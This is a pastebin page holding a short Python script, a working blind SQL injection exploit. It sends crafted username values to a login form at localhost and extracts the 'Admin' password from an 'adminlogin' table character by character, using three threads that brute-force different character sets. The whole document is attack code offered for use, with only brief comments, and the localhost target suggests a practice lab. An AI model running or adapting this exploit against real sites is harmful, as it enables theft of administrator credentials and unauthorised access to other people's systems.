Untitled

mail@pastecode.io avatar
unknown
plain_text
2 years ago
1.8 kB
7
Indexable
Never
import requests
from threading import Thread, Lock

result = []
def ThreadJob(x,p,lock):
        global result
        #victim's url containing a login form vulnerable to Blind SQLi
        url = "http://localhost:1234"
        while True :
                for i in x:
                        exploit = "' or substring((SELECT password FROM adminlogin WHERE username='Admin'),"+ str(p) +",1) ='" + i + "'  -- -"
                        data = {'username' :  exploit  , 'password' : 'aaa' }
                        #sending a post request containing our exploit
                        r = requests.post(url=url, data=data)
                        #test if the caracter is correct
                        if ("Welcome," in r.text):
                                lock.acquire()
                                result.insert(p,i)
                                print (result)
                                lock.release()
                                break
                        elif (i == x[25]):
                                break
                p+=1

def main():
        #testing for lowercase
        liste1="azertyuiopqsdfghjklmwxcvbn"
        #testing for uppercase
        liste2="AZERTYUIOPMLKJHGFDSQWXCVBN"
        #testing for numbers + special caracters
        liste3="1234567890(-_)}]@|[{#~*%$?"
        #creating lock
        lock = Lock()
        #creating threads
        t1 = Thread(target=ThreadJob, args=(liste1,1,lock))
        t2 = Thread(target=ThreadJob, args=(liste2,1,lock))
        t3 = Thread(target=ThreadJob, args=(liste3,1,lock))

        t1.start()
        t2.start()
        t3.start()

        t1.join()
        t2.join()
        t3.join()
        print (result)

main()